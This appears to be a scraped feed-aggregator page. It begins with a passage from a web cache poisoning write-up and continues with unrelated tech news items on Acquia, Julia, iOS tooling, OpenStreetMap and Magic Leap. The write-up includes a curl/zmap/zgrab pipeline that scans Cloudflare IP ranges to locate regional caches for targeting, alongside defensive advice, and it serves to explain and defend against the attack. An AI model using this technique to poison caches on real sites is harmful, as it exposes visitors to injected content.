One triager, scoring my submission using CVSS, gave a CloudFront cache poisoning report an access complexity of 'high' because an attacker might need to rent several VPSs in order to poison all CloudFront's caches. Resisting the temptation to argue about what constitutes 'high' complexity, I took this as an opportunity to explore whether cross-region attacks are possible without relying on VPSs.

It turned out that CloudFront have a helpful map of their caches, and their IP addresses can be easily identified using free online services that issue DNS lookups from a range of geographical locations. Poisoning a specific region from the comfort of your bedroom is as simple as routing your attack to one of these IPs using curl/Burp's host-name override features.

As Cloudflare have even more regional caches, I decided to take a look at them too. Cloudflare publish a list of all their IP addresses online, so I wrote a quick script to request waf.party/cgn-cgi/trace through each of these IPs and record which cache I hit:

curl https://www.cloudflare.com/ips-v4 | sudo zmap -p80| zgrab --port 80 --data traceReq | fgrep visit_scheme | jq -c '[.ip , .data.read]' cf80scheme | sed -E 's/\["([0-9.]*)".*colo=([A-Z]+).*/\1 \2/' | awk -F " " '!x[$2]++'

This showed that when targeting waf.party (which is hosted in Ireland) I could hit the following caches from my home in Manchester:

104.28.19.112 LHR    172.64.13.163 EWR    198.41.212.78 AMS
172.64.47.124 DME    172.64.32.99 SIN    108.162.253.199 MSP
172.64.9.230 IAD    198.41.238.27 AKL    162.158.145.197 YVR

Defense

The most robust defense against cache poisoning is to disable caching. This is plainly unrealistic advice for some, but I suspect that quite a few websites start using a service like Cloudflare for DDoS protection or easy SSL, and end up vulnerable to cache poisoning simply because caching is enabled by default.

Restricting caching to purely static responses is also effective, provided you're sufficiently wary about what you define as 'static'.

Likewise, avoiding taking input from headers and cookies is an effective way to prevent cache poisoning, but it's hard to know if other layers and frameworks are sneaking in support for extra headers. As such I recommend auditing every page of your application with Param Miner to flush out unkeyed inputs.

Once you've identified unkeyed inputs in your application, the ideal solution is to outright disable them. Failing that, you could strip the inputs at the cache layer, or add them to the cache key. Some caches let you use the Vary header to key unkeyed inputs, and others let you define custom cache keys but may restrict this feature to 'enterprise' customers.

Finally, regardless of whether your application has a cache, some of your clients may have a cache at their end and as such client-side vulnerabilities like XSS in HTTP headers should never be ignored.

Conclusion

Web cache poisoning is far from a theoretical vulnerability, and bloated applications and towering server stacks are conspiring to take it to the masses. We've seen that even well-known frameworks can hide dangerous omnipresent features, confirming it's never safe to assume that someone else has read the source code just because it's open-source and has millions of users. We've also seen how placing a cache in front of a website can take it from completely secure to critically vulnerable. I think this is part of a greater trend where as websites become increasingly nestled inside helper systems, their security posture is increasingly difficult to adequately assess in isolation.

Finally, I've built a little challenge for people to test their knowledge, and look forward to seeing where other researchers take web cache poisoning in future.


          Acquia Cloud, Site Factory, Drupal FAQ      Cache   Translate Page   Web Page Cache   
Acquia Cloud, Site Factory, Drupal FAQ

Have you ever looked through Acquia’s website and thought “Hmmmm … what does that mean exactly?” If you answered yes, then this post is for you. We’ve heard your questions and we’re answering them in plain English for you.

What is the difference between Acquia Cloud and Acquia Cloud Site Factory?

Webinar: Building with Acquia's Site Factory

Learn from this step-by-step webinar how Acquia Cloud Site Factory provides a better way to create and manage Drupal multisite deployments. 

WATCH NOW

Acquia Cloud is a platform that manages Drupal applications. Site Factory adds the ability to manage multisite Drupal applications. "Multisite" is a specific configuration that enables a single Drupal application to support multiple websites. When one application supports just one website – as is the case for most Acquia Cloud customers – technical and business processes are relatively streamlined.

Applying a security patch your Drupal application, for example, only impacts one website. Giving your site administrator rights to the Drupal website just means adding credentials in one place.

Imagine if one Drupal application supported 50 websites. Applying the security patch will impact 50 websites. Adding admin users to 50 websites becomes a cumbersome task. Now imagine that same scenario across 5000 websites. Acquia Cloud Site Factory provides tools that make managing that complexity easier for both technical and business users.

One of the big differences between Acquia Cloud and Acquia Cloud Site Factory is that Acquia Cloud is intended to be used by technical teams such as developers and devops engineers, whereas Acquia Cloud Site Factory offers features for both technical and non-technical users such as marketers.

Most notably, Acquia Cloud Site Factory gives marketers the ability to create sites from their Drupal application with just a few clicks – no development expertise needed. In addition to this no-code site creation capability, organizations look to Acquia Cloud Site Factory when they want to scale to hundreds or thousands of sites in a short amount of time.

This isn’t to say that Acquia Cloud isn’t for organizations looking to scale their digital presence; we’re simply saying that Site Factory is best for digital experiences at a mass scale.  

Get updates

Receive the best content about the future of marketing, industry shifts, and other thought leadership.

What do I get with managed service?

When we talk about managed services we are talking about a cloud platform where we have already orchestrated all of the parts of the cloud for you. We operate the cloud so you don’t have to. So what exactly are you getting with managed services? The short answer is a platform that is orchestrated, automated and operated for you so all you have to do is start building your applications.

Why do I need Acquia to host Drupal?

You don’t need Acquia to host Drupal per se; anyone can do that. However, Acquia provides the support, security and scale so you can build faster. That translates to less for your IT teams to manage than they would with a DIY approach, more robust than hosting since it’s a PaaS, and it’s more cost effective than other proprietary vendors because we don’t charge a licensing fee. Basically, you get the beauty of open source but with all the support and security bells and whistles.

We’ll be back in a few weeks with a whole new set of questions. Is there something you need to know right this very second (OK, probably not that quickly, but you get the point)? Hit us up on Twitter at @acquia. Otherwise, stay tuned.

Reena Leone

Senior Manager, Content Marketing Acquia

Reena Leone has nearly 10 years of digital marketing experience, working for both digital agencies and global brands.

A self-described “writer, podcaster, cosplayer, and nerd,” she said her favorite aspect of working at Acquia is her collaboration with colleagues.

“When we say ‘#ilovemyteam,’ it's not a joke. This is the kind of place where you can be you; individuality is encouraged,” Leone said.

Since she started at Acquia, Leone has had the opportunity to forge her own career path, she said.

“This flexibility has made me more capable of handling any challenge thrown my way, and allowed me to grow my skills as a writer, editor, and manager.”

david.pierce Thu, 08/02/2018 - 20:25
You Ask, We Answer: Acquia Cloud, Site Factory and Drupal

          Hollywood gets its own open source foundation      Cache   Translate Page   Web Page Cache   
Open source is everywhere now, so maybe it’s no surprise that the Academy of Motion Picture Arts and Sciences (yes, the organization behind the Oscars) today announced that it has partnered with the Linux Foundation to launch the Academy Software Foundation, a new open source foundation for developers in the motion picture and media space. […]
          The Academy teams up with Linux Foundation for open source tech      Cache   Translate Page   Web Page Cache   
The Academy for Motion Picture Arts and Sciences (AMPAS), best known for running the Oscars, is diving into the technology world in a surprisingly new way. Together with the Linux Foundation, it's launching the Academy Software Foundation (ASWF), a n...
          The Academy teams up with Linux Foundation for open source tech      Cache   Translate Page   Web Page Cache   

The Academy teams up with Linux Foundation for open source techThe Academy for Motion Picture Arts and Sciences (AMPAS), best known for



          iOS Dev Weekly - Issue 364 - Aug 10th 2018      Cache   Translate Page   Web Page Cache   

Comment

Last week I talked about a recent controversy with apps that used VPN APIs for things that they were not intended for. This week brought with it more hiccups after a change in policy around gambling apps caused quite a few removals from the store. To sum it up, apps that involve gambling of any kind (either real or simulated) must now be on the App Store account of a corporate entity rather than an individual.

I think the change itself is probably reasonable given the regulations and liabilities around gambling. It's also a good sign that Apple are continuously looking at the rules of the App Store and tweaking them where it makes sense. What I think could be handled so much better though, as with many things that Apple does, is the communication around the changes. It appears that the review guidelines are not yet updated with the new policy and the method of communication to affected developers seems to have been an email which arrived after their apps had been removed from the store.

I haven't mentioned yet that the removal process in this instance also seemed to be a bit over zealous with several false positives being reported. I don't think this is worth talking much about as it seems to be a mistake which is getting quickly corrected. However that would have been so much simpler to determine if the change had been communicated clearly.

The ironic thing is that better communication would benefit Apple as much as it would us developers. Instead of Twitter and blogs exploding with overreactions to every change, Apple could get out in front of the conversation and quash the controversies before they explode. At the very least, the App Store guidelines must start getting updated to accompany policy changes, but I think a news post or similar before they happen would also be a great step forward.

Dave Verwer

News

Approximately ⅓ of all App Store submissions get rejected

The real number is much, much lower of course as many apps will be rejected for issues during review only to then be allowed through once they are resolved. Even so, that's a much higher percentage than I would have guessed at!

twitter.com

Sponsored Link

Find An iOS Dev Job Through Vettery

Vettery specializes in developer roles and is completely free for job seekers. Interested? Submit your profile, and if accepted onto the platform, you can receive interview requests directly from top companies growing their mobile dev teams. Get Started.

vettery.com

Tools

xiblint

SwiftLint is a fantastic tool for keeping your code standards in check, but what about Storyboards and XIBs? With checks for accessibility labels, ambiguous/misplaced views and a font check to make sure there's no rogue fonts hiding in a storyboard, I really like this.

When I saw this it felt familiar and I thought I had linked to it before, but searching the archives tells me I hadn't! Thanks to Jonathan Wight for reminding me of it! Too many links...

github.com

knil

Universal links are cool, but testing them can be hard. Luckily Ethan Huang is here to make it easy! 😀 This tool downloads your association file and allows you to test it as well as providing shortcuts to the Apple and Branch validation tools.

github.com

xcode-install

I saw this tweet by Felix Krause this week and it seemed like a good idea to remind everyone that during this period of almost weekly new Xcode releases, you don't need to go to the Xcode downloads page every time!

github.com

Code

Unwrap

I've been following Paul Hudson's tweets about his new app for teaching Swift using his Swift in 60 seconds content. Yesterday saw him release the code to GitHub. This isn't just a release of the content (although that is included), but a release of the app itself, including all of the quiz functionality for you to look through and learn from.

Just note that this code is not open source, yet!

twitter.com

Building Fluid Interfaces

I agree with Nathan Gitter that the Designing Fluid Interfaces presentation from WWDC this year was outstanding. It was focused on concepts and design rather than implementation though. What if someone had put together the examples used in the talk into a project that was available on GitHub? Thanks Nathan!

medium.com

ScrollingStackViewController

After talking about stack views inside scroll views last week, Maciej Trybiło was kind enough to let me know about ScrollingStackViewController which packages the same technique up into a library. Just subclass ScrollingStackViewController and add your child view controllers. 👍

github.com

Refactoring Massive App Delegate

I feel like the days of truly massive application delegates are thankfully behind us, but that doesn't you won't find them becoming a bit of a dumping ground if not watched carefully. We'll all be familiar with that code that started as "Oh this is just one line of code in didFinishLaunching" that ultimately grew to become much bigger. Vadim Bulavin has some techniques to help you keep it under control.

vadimbulavin.com

The Case for CloudKit

Firebase seems to be taking over the world a bit, but before you commit to it for your next project read Andrew Bancroft's case for CloudKit. I still think if you're building something truly serious then rolling your own back end is probably the way to go, but I do like CloudKit too.

andrewcbancroft.com

Books

Server Side Swift with Vapor

Server side Swift certainly hasn't gone mainstream yet, but with Vapor hitting 3.0 recently it might be something you've thought about learning. If that's the case then this book looks to be a great way to get up to speed. Just a note for full disclosure, I asked for a review copy of this book as it looked interesting and was provided with one.

Oh and congratulations to Ray and the team on the new site design. It's certainly come a long way from the early days!

raywenderlich.com

Jobs

Swift Developer WillowTree Charlottesville VA

Get paid to build cool stuff. Competitive pay. Exciting projects. Great people.

jobvite.com

iOS Developer at Savvy Apps (Remote)

Come build world-class apps at Savvy. Proudly remote since 2009.

savvyapps.com

Build iOS for Agriculture at Granular, San Francisco

Join a small team digitizing farms around the globe using the latest mobile technologies!

grnh.se

And finally...

They've gathered enough data on stop signs and storefronts...

The stage after this is to make us play a game where we drive a car down a highway for 10 seconds to complete the CAPTCHA. That's the secret of how we'll get self driving cars. 🚖

twitter.com


This RSS feed is published on https://iosdevweekly.com/. You can also subscribe via email or Safari push notifications.


          PHP, Open Source, Node. JS Application, CMS, Odoo Development Company in USA. | Agile Infoways      Cache   Translate Page   Web Page Cache   
Agile Infoways is best PHP, Node. Js , CMS, Odoo ERP Development Company in USA. Hire Our Dedicated Web Apps Developers from us who are expert in each development like PHP, AngularJs, Python, Open Source Development.
          Towards a dedicated public issue tracking/project management system for OSM      Cache   Translate Page   Web Page Cache   

We have various communication channels in OpenStreetMap being used for different needs in communication. The mailing lists and forum work reasonably well for free and open discourse of the community, changeset discussions allow communicating on specific edits in the map (and we have for example Pascal's tool to look through these). We have the user diaries for people publishing their thoughts and experiences on the project and discussing them with others. And we have the OSM wiki which is used as a place to document things.

All of these have their issues and room for improvements but they are widely used and accepted as the platforms where communication happens. And they all have relatively low entry barriers as evidenced by the fact that quite a lot of people use them actively.

What we don't have and where we have in OpenStreetmap a fairly obviously increasing need for is a means for project organization and related communication, task and issue tracking etc. There is a very old trac instance but this is hardly used any more and has a fairly awkward usability, in particular for non-programmers. Safe to say this is not an established communication platform any more.

Because of that people have started widely using external commercial platforms, in particular github, for this kind of work.

Specific examples:

  • corporations doing organized edits have github repositories to track their work - like here, here, here and here
  • import planning is frequently performed on github - like here and here
  • there are attempts to move tagging discussion to github issue trackers here
  • the OSMF and its working groups using github for issue tracking (both publicly and internally), public examples here and here

For OpenStreetMap this is not a good development for various reasons:

  • github is designed for software developers and is practically much less accessible for non-developers. Even if non-developers manage to adapt to this they will always feel less at home there and as a result there is an inherent dominance of the software developers over non-developers on github.
  • the requirement to register on an external platform and accept the terms of service there poses a highly problematic hurdle. It should always be the goal that an OSM community member should be able to participate in all public community discourse without such hurdles.
  • quite a few people have principal ethical concerns regarding platforms like github which are usually financed through either advertisement or sale of personal information about its users.
  • since the github software is not open source use of github is in conflict with the general culture of OpenStreetMap to base itself on open source technology.

Because of these problems i am generally inclined to boycott attempts to move non-development discussions to github. But this is somewhat difficult if you can't point to a suitable alternative. I would therefore propose we set up an open source project management system that can be used by everyone with an OSM account for use by the OSM community. There are quite a few software products available for this.

There are various questions and arguments that might come up regarding this suggestion:

  • Do we really need this kind of tool in OSM? Yes, the fact that github is used so widely for OSM projects is a clear indicator.
  • But github is so convenient, everyone already knows how to use it while something else you would have to newly learn to use. Yes, for you that might apply - but you are putting the convenience of you and a few other people familiar and comfortable with github over the interests of the vast majority of mappers.
  • Why should the OSMF invest money and work into self hosting something when there are github alternatives based on open source software available for use that might offer affordable service plans for an organization like OSM? Mostly to ensure a low entry barrier for people to participate by requiring nothing more than an OSM account. If this could be achieved with an externally hosted tool and reliability of the service and access to and ownership of the database are ensured, external hosting would IMO also be an option.
  • Won't this fragment the discourse in the OSM community by creating yet another set of communication channels you need to follow to stay informed? Yes, that is a possibility - but as said this is already happening through the use of github at the moment. I think a dedicated OSM platform would improve the situation on this matter.
  • Should this be a pure project management/issue tracking platform or also a source code repository and version management system? That's a good question. Many of the free software options available offer both. But most software development projects around OpenStreetMap are independently managed and you can't force any of them to move. The core arguments for not using github i listed do not necessarily apply to all of these projects. The main use case would at least initially be non-development projects. And therefore usability for non-developers should be a primary concern.
  • Great, but who does the work necessary to set this up? Ideally such a platform would be integrated into the existing OSM website with notifications via the OSM website messaging system, using the configured language settings and possibly connections to changeset discussions etc. That would be a lot of work to set up. But running it separately similar to the OSM Forum would already be a useful first step. This would require some work from operations to set this up and maintain it. But the more difficult steps are probably to come to a decision with wide support what we need in terms of features, what software should be chosen for this and to configure and adjust it for OpenStreetMap's needs. This post is meant to start the discussion on these questions.

          Hollywood Goes Open Source: Academy Teams Up With Linux Foundation to Launch Academy Software Foundation      Cache   Translate Page   Web Page Cache   
Hollywood now has its very own open source organization: The Academy of Motion Picture Arts and Sciences has teamed up with the Linux Foundation to launch the Academy Software Foundation, which is dedicated to advance the use of open source in film making and beyond. The association’s founding members include Animal Logic, Autodesk, Blue Sky […]

          Micropython for Unified Extensible Firmware Interfaces (UEFI)      Cache   Translate Page   Web Page Cache   
TianoCore is the community supporting an open source implementation of a Unified Extensible Firmware Interface (UEFI), which is the code that sits between an operating system and a hardware’s firmware. We’re all familiar with UEFI for modern computers, it supplanted what was called BIOS and is shown when getting into a machine’s setup. The project has […]
          Comment on OTTO: A Pi Based Open Source Music Production Box by Ren      Cache   Translate Page   Web Page Cache   
I hadn't heard of Fe-Pi (Iron Pie?). Nice... I might order that audio [p]hat/shield/cape/wing/etc today. https://fe-pi.com/products/fe-pi-audio-z-v2
          Comment on Open Source Meetup in Munich- Feb 26 – with Kev Needham and Chris Hofmann by ProxyBig      Cache   Translate Page   Web Page Cache   
<strong>ProxyBig</strong> I found a great...
          IT Integration Delivery Manager - Thrivent Financial - Appleton, WI      Cache   Translate Page   Web Page Cache   
Experience in open source technologies such as Atlassian, Camunda, MongoDB, RabbitMQ preferred. Key responsibilities will include:....
From Thrivent Financial - Fri, 25 May 2018 00:17:41 GMT - View all Appleton, WI jobs
          Hollywood gets its own open-source foundation      Cache   Translate Page   Web Page Cache   
Open source is everywhere now, so maybe it’s no surprise that the Academy of Motion Picture Arts and Sciences (yes, the organization behind the Oscars) today announced that it has partnered with the Linux Foundation to launch the Academy Software Foundation, a new open-source foundation for developers in the motion picture and media space. The […]
          Magic Leap sort enfin son casque de réalité mixte      Cache   Translate Page   Web Page Cache   

Depuis 7 ans, Magic Leap a su nous vendre du rêve : des démos bluffantes (dont certaines ont été, possiblement, manipulées), des technologies nouvelles, réellement nouvelles. Finalement, la première version des lunettes de réalité mixte a été dévoilé il y a quelques jours. Et les premiers commentaires ne sont pas forcément flatteurs. Il faut dire que l’attente était énorme, avec des investisseurs prestigieux et beaucoup d’argent, presque 3 milliards !

Oui, Magic Leap One Creator est enfin lancé, diffusion restreinte pour le moment et pour la modique somme de 2 295 $. Le device est autonome dans le sens qu’il n’a pas besoin d’un ordinateur connecté car il possède son propre traitement local mais on doit porter un module externe. Il est assez imposant et il se connecte aux lunettes, en filaire. On dispose aussi d’un contrôleur. Ce qui surprend au premier regard, c’est la massivité de l’ensemble, moins qu’un Hololens mais tout de même, il reste imposant. La face avant possède de multiples capteurs et caméras. 

Le Lightpack, le fameux module à la ceinture, embarque les CPU et GPU : Nvidia Parker SoC, 128 Go de stockage (seulement 95 de disponibles), Nvidia Pascal (256 coeurs CUDA), batterie, 8 Go de mémoire, support WiFi et Bluetooth. L’autonomie annoncée est de 3h en utilisation continue mais le constructeur ne dit pas s’il s’agit d’usage intensif ou normal. Les premiers testeurs notent que le device est confortable à porter. Cependant, Magic Leap, pour The Verge, n’offre pas l’expérience attendue après tant d’attentes. Il ne se démarque pas franchement d’un Hololens et connait les mêmes limitations du champ de visions. Nos confrères pointe du doigt, le fossé entre les promesses, et les milliards investis, et la réalité de ce device. Il pointe aussi la présence du contrôleur, qui ressemble à celui de l’Oculus Go. Les applications et démos proposées semblent de qualité mais difficile de se faire une idée du potentiel réel du device. 

Ce modèle est plus destiné aux amateurs et développeurs qu’au tout public. Il faut dire que le tarif est très dissuasif. Mais contrairement à Hololens, Magic Leap veut banaliser cette technologie mais nous en sommes encore loin. Un énorme travail de design, logiciel et matériel, reste à faire et bien entendu, avec un tarif bien plus agressif. Il faudra aussi réfléchir à intégrer le compute dans le casque et non via un boitier externe. Comme les autres devices autonomes, l’autonomie sera à améliorer. Sur le contenu, problème de tous les constructeurs, Magic Leap devra rapidement convaincre les éditeurs et les développeurs, ce que les concurrents arrivent difficilement.

Magic Leap utilise une distribution Linux dédiée : LuminOS. Actuellement, l’OS est en version 0.91 et il est encore en pré-version ce qui influence l’utilisation du casque. Le système a été adapté par les équipes internes. Il dérive  de Linux et de AOSP (Android Open Source Project). Nous retrouvons les couches habituelles d’un OS : noyau, les services systèmes, les API plateforme, les runtimes (Lumin) et les moteurs 3D (Unreal, Unity), l’interface et les applications. Le runtime Lumin contient toutes les API et librairies de Magic Leap. 

Dès mars dernier, le constructeur avait lancé son SDK, Lumin SDK. Il est compatible Unreal et Unity, un émulateur est aussi présent. Le SDK est actuellement en version 0.16.0 mais le constructeur précise que tout n’est pas encore disponible et que le kit comporte des bugs et défauts. Il évoluera très régulièrement pour stabiliser. Il est utilisable sur macOS et Windows. 

L’interface se fait principalement avec deux éléments :

- Universe : ergonomie de base pour interagir avec l’OS. Ce n’est pas une application immersive mais Universe travaille directement avec Landscape. Universe propose les apps de bases pour la navigateur : vue home, le lanceur d’apps, les paramètres, les notifications. 

- Landscape : c’est le canvas de base pour la notion spatiale de Magic Leap, ou comment mapper / mixer les objets virtuels et la réalité.

A cela se rajoute une 3e brique, ciblant les développeurs web : Prismatic. Il s’agit d’une librairie JavaScript pour faciliter le développement de contenus virtuels / augmentée web avec le runtime Lumin. L’idée est de pouvoir utiliser ces contenus / apps avec Magic Leap. 

A noter qu’actuellement, seuls les éditeurs et les entreprises peuvent publier des contenus . La partie développeur arrivera prochainement. 

Catégorie actualité: 
Image actualité AMP: 
magic leap

          How to Install Apache Maven on CentOS 7      Cache   Translate Page   Web Page Cache   
Apache Maven is a open source software project management and build automation tool, that is based on the conception of a project object model (POM), which is primarily used for deploying Java-based applications, but...
          iOS дайджест #27: React Native — ну сколько можно, 10 лет AppStore, новинки Swift 4.2      Cache   Translate Page   Web Page Cache   

В выпуске: анализ CI сервисов, немного реверс инжинирим, упрощаем себе жизнь с помощью различных инструментов, любуемся Apple design award.

News

Swift Evolution
Судя по обновленному readme, Swift 5 стоит ждать уже в начале следующего года.

CarPlay iOS 12.0 Beta 1 to Beta 2 API Differences
В iOS 12 Beta 2 добавили много новых методов для CarPlay.

The App Store turns 10
App Store исполнилось 10 лет. Эти 10 лет многое изменили в плане бизнеса и потребления контента на мобильных устройствах.

10 years of the App Store: The design evolution of the earliest apps
И еще одна статья про десятилетние: как менялись приложения за эти 10 лет.

Apple Design Awards 2018
Победители Apple Design Awards 2018. Интересно наблюдать, как из года в год меняются тенденции дизайна.

За 4 года в репозитории Swift уже 18000 Pull Requests.

initial checkin, nothing much to see here.
Хоть Swift объявили 4 года назад, ему уже исполнилось 8 лет на самом деле.

Articles

Swift for Android: Our Experience and Tools
React Native не нужен, или как Readdle решили сделать андроид приложение на Swift. Судя по примеру приложения, не очень похоже на чистый Swift. Стоит ли оно того? Думаю, узнаем из новых статей от ребят.

Benchmark of Swift extensions vs methods: Swift 4.1
О боже, о боже, наличие множества экстеншенов замедляет скорость компиляции. Но только эта разница становится значимой, если у вас тысячи методов.

Интересная статистика — чему больше всего уделяют внимания на WWDC. Радует, что в этом году уделили больше времени macOS.

Enabling newly added opt-in features in Xcode 10
Если вы уже пользуетесь Xcode 10, то имеет смысл включить новые фичи.

Custom Intents with SiriKit on iOS 12
Уже подоспели первые туториал по SiriKit. Не забываем, что много из этого доступно в видео с WWDC.

Быстрые команды Siri
А если хотите на русском, то вот (не перевод).

Any[Object]
Тип AnyObject в Swift не такой простой как кажется. В конце статьи есть ряд правил, которые помогут предотвратить неочевидные баги.

The iOS Testing Manifesto
Это уже становится традицией — подробный гайд про тестирование.

Painless Core Data in Swift
Еще немного советов по работе с Core Data.

Continuous Integration Services for iPhone Apps in 2018
Обзор CI сервисов. В конце есть Editor’s Choice.

AvitoTech team playbook
Avito делятся, как у них устроена команда, процессы, а также рассказывают про историю, ценность компании.

iOS Developer Skills Matrix
Матрица Junior-Middle-Senior. Все, конечно, условно и зависит от компании, но все равно забавно посмотреть.

State of React Native 2018

Или все-таки нужен React Native? Facebook работает над новой версией RN, в которой будет легче работать с нативными элементами. При этом старые приложения будет легко адаптировать. Ждем новостей ближе к концу года.

React Native at Airbnb
Цикл статей из 5 статей от Airbnb, где они рассказывают о своем двухлетнем опыте использования React Native. Если коротко, то поигрались и хватит. Но опыт интересный в любом случае.

The Case for React Native
А Эш рассказывает, как ему нравится RN. Решать вам, использовать или нет.

Airbnb and React Native Expectations
А потом решил прокомментировать статьи от Airbnb. Тоже интересное мнение.

React Native: A retrospective from the mobile-engineering team at Udacity
И еще одна компания попробовал RN и отказалась. Статья странноватая, но все же.

What we learned about CI/CD analysing 75k builds
Интересная статистика по поводу использования CI в мобильных проектах.

The Story Behind Susan Kare’s Iconic Design Work for Apple
История создания иконок для первых макинтошей.

iPad Navigation Bar and Toolbar Height Changes in iOS 12
Просто взяли, поменяли высоты навигейшен бара или таббара и никому не сказали. Молодцы Apple.

How to Use Slack and Not Go Crazy
Несколько советов, как работать со Slack, чтобы жизнь была немного проще.

A Year of Monument Valley 2
Monument Valley подвели итоги года. Там же доступны итоги прошлых лет. Интересно наблюдать, как вырос китайский рынок.

Reverse Engineering Instruments’ File Format
Почему бы не пореверс-инженерить формат файла инструментов в Xcode?

Code

What’s new in Swift 4.2
Xcode 10 c поддержкой Swift 4.2 выйдет осенью, а пока можно потыкать бету и посмотреть, какие фичи нас ждут.

Swift’s new calling convention
Новый calling conventions в Swift 4.2 должен улучшить производительность за счет сокращения вызовов retain, release. Ждем бенчмарки.

Icon for File with UIKit
Получаем картинки для разных типов файлов. В общем-то, это достаточно популярный подход в macOS, в CleanMyMac мы его тоже часто используем.

Writing self-documenting Swift code
Я всегда за то, чтобы использовать переменные или функции вместо комментариев, которые устаревают, теряются или еще что-то. На эту тему есть еще хорошая шутка. Джон рассказывает еще про несколько подходов, как сделать код самодокументируемым.

Making Swift tests easier to debug
Ни один дайджест не обходится без статей от Джона. Читаемость тестов не менее важна, чем читаемость самого кода, так как это пример того, как использовать код и они зачастую полезнее любой документации.

Swift Diagnostics: #warning and #error
Возможно, вы уже видели, что в Swift 4.2 добавили #warning и #error. Но как это реализовано под капотом?

Enumerating enum cases in Swift
Наконец-то можно получить все cases в enum и не хардкодить это каждый раз.

Swift Tip: Quick Performance Timing
Небольшой сниппет, как замерить скорость выполнения какой-либо операции.

Exploring @dynamicMemberLookup
Долгожданный динамизм добавили даже раньше времени — в Swift 4.2. Вспоминаем что это такое и еще полезный хак, как не выстрелить себе в ногу.

Finding Non-localized Strings
Всего один ключ поможет найти не локализованные строки в приложении.

@autoclosure what, why and when
Никогда не использовал и уже забыл, что такое есть в Swift. Кто-то его использует?

Tools & Libs

Xcode для iPad, почему бы и нет.

MarzipanTool
Хотите попробовать запустить iOS приложение на macOS? Тогда этот репозиторий специально для вас.

xcprojectlint
Был линтер для IB, должен быть и линтер для файлов проекта.

iOSLocalizationEditor
Довольно удобное приложение для редактирования файлов локализации.

Extensible mobile app debugger
Facebook выпустил платформу для дебага мобильных приложений с десктопным приложением и плюшками. Кто уже успел попробовать?

Sift app
Приложение, которое показывает запросы в сеть от всех приложений. В AppStore такое не пустят, так что можно только сбилдить тебе на устройство.

Check if UIImage exists in assets in compile time
Если вы не пользуетесь SwiftGen, R.swift или другим подобным решением, либо все еще пишите на Objective-C, то это может стать полезной находкой. Скрипт проверяет наличие используемых картинок в проекте.

NonEmpty
Библиотека, которая гарантирует на этапе компиляции, что коллекция будет непустая 😱

Bartinter
Если контент приложения налазит на статус бар, по-любому будет ситуация, когда он совпадет с фоном. Чтобы не париться, можно взять библитеку, которая определяет яркость фона и меняет цвет статус бара.

SwiftServerSide-Vapor
Вроде довольно неплохой пример приложения на Swift 4.1 и Vapor 3. На китайском, правда, но если хотите сделать регистрацию, какой-то фид и прочее на Vapor, то можно посмотреть.


← Предыдущий выпуск: iOS дайджест #26


          Motion picture academy and Linux Foundation partner to launch Academy Software Foundation, an open source forum for developers in motion picture and media space (Frederic Lardinois/TechCrunch)      Cache   Translate Page   Web Page Cache   

Frederic Lardinois / TechCrunch:
Motion picture academy and Linux Foundation partner to launch Academy Software Foundation, an open source forum for developers in motion picture and media space  —  Open source is everywhere now, so maybe it's no surprise that the Academy of Motion Picture Arts and Sciences (yes …


          JAVA EN OPEN SOURCE ONTWIKKELAAR HASSELT - Xplore Group - Kontich      Cache   Translate Page   Web Page Cache   
Bij voorkeur behaalde je een bachelor of masteropleding, of volgde je een opleiding tot Java-programmeur bij de VDAB....
Van Bonque - Sat, 28 Jul 2018 10:43:02 GMT - Toon alle vacatures in Kontich
          JAVA EN OPEN SOURCE ONTWIKKELAAR KONTICH (Antwerpen) - Xplore Group - Kontich      Cache   Translate Page   Web Page Cache   
Bij voorkeur behaalde je een bachelor of masteropleding, of volgde je een opleiding tot Java-programmeur bij de VDAB....
Van Bonque - Sat, 28 Jul 2018 10:43:03 GMT - Toon alle vacatures in Kontich
          JAVA EN OPEN SOURCE ONTWIKKELAAR MERELBEKE (GENT) - Xplore Group - Kontich      Cache   Translate Page   Web Page Cache   
Bij voorkeur behaalde je een bachelor of masteropleding, of volgde je een opleiding tot Java-programmeur bij de VDAB....
Van Bonque - Sat, 28 Jul 2018 10:43:03 GMT - Toon alle vacatures in Kontich
          Audacious 3.10      Cache   Translate Page   Web Page Cache   
Description: Audacious is an open source audio player that plays your music how you want it, without stealing away your computer’s resources from other tasks.Drag and drop folders and individual song files, search for artists and albums in your entire music library, or create and edit your own custom playlists. Listen to CD’s or stream […]
          OTTO: A Pi Based Open Source Music Production Box      Cache   Translate Page   Web Page Cache   

Want an open source portable synth workstation that won’t break the bank? Check out OTTO. [Topisani] started OTTO as a clone of the well-known Teenage Engineering OP-1. However, soon [Topisani] decided to branch away from simply cloning the OP-1 — instead, they’re taking a lot of inspiration from it in terms of form factor, but the UI will eventually be quite different.

On the hardware side, the heart of the OTTO is a Raspberry Pi 3. The all-important audio interface is a Fe-Pi Audio Z V2, though a USB interface can be used. The 48 switches and four rotary encoders …read more


           Best Open Source For Haliday Letting Clone Script - Appkodes ( Amqui)      Cache   Translate Page   Web Page Cache   
Airbnb Clone is a holiday letting clone script who is aimed after grant rooms because peoples regarding Holidays thru online reserving all round the world. Airbnb clone has a lump over services provide choice honestly flip your internet site among a hot m...
          Telecommute Full Stack Developer      Cache   Translate Page   Web Page Cache   
A web design and development company needs applicants for an opening for a Telecommute Full Stack Developer. Core Responsibilities of this position include: Jumping in and developing in a brand new development stack Interacting with clients and understanding the needs of the business Skills and Requirements Include: Strong understanding of JavaScript and popular frameworks like Angular, React, or VueJS Pixel-level perfection when implementing designs created by your team The ability to iterate and ship ideas quickly, with loose (at best) direction A love of Open Source software Positive can-do attitude with the ability to follow through
          Motion picture academy partners with Linux Foundation to launch an open source foundation for developers working on animation, visual effects, and more (Frederic Lardinois/TechCrunch)      Cache   Translate Page   Web Page Cache   

Frederic Lardinois / TechCrunch:
Motion picture academy partners with Linux Foundation to launch an open source foundation for developers working on animation, visual effects, and more  —  Open source is everywhere now, so maybe it's no surprise that the Academy of Motion Picture Arts and Sciences (yes, the organization behind the Oscars) …


          What’s new in Julia: Version 1.0 is here      Cache   Translate Page   Web Page Cache   

After nearly a decade in development, Julia, an open source, dynamic language geared to numerical computing, reached its Version 1.0 production release status on August 8, 2018. The previous version was the 0.6 beta.

Julia, which vies with Python for scientific computing, is focused on speed, optional typing, and composability. Programs compile to native code via the LLVM compiler framework. Created in 2009, Julia’s syntax is geared to math; numeric types and parallelism are supported as well. The standard library has asynchronous I/O as well as process control. logging, and profiling.

To read this article in full, please click here

(Insider Story)
          PnP SharePoint Framework Property Controls v1.9.0 released      Cache   Translate Page   Web Page Cache   

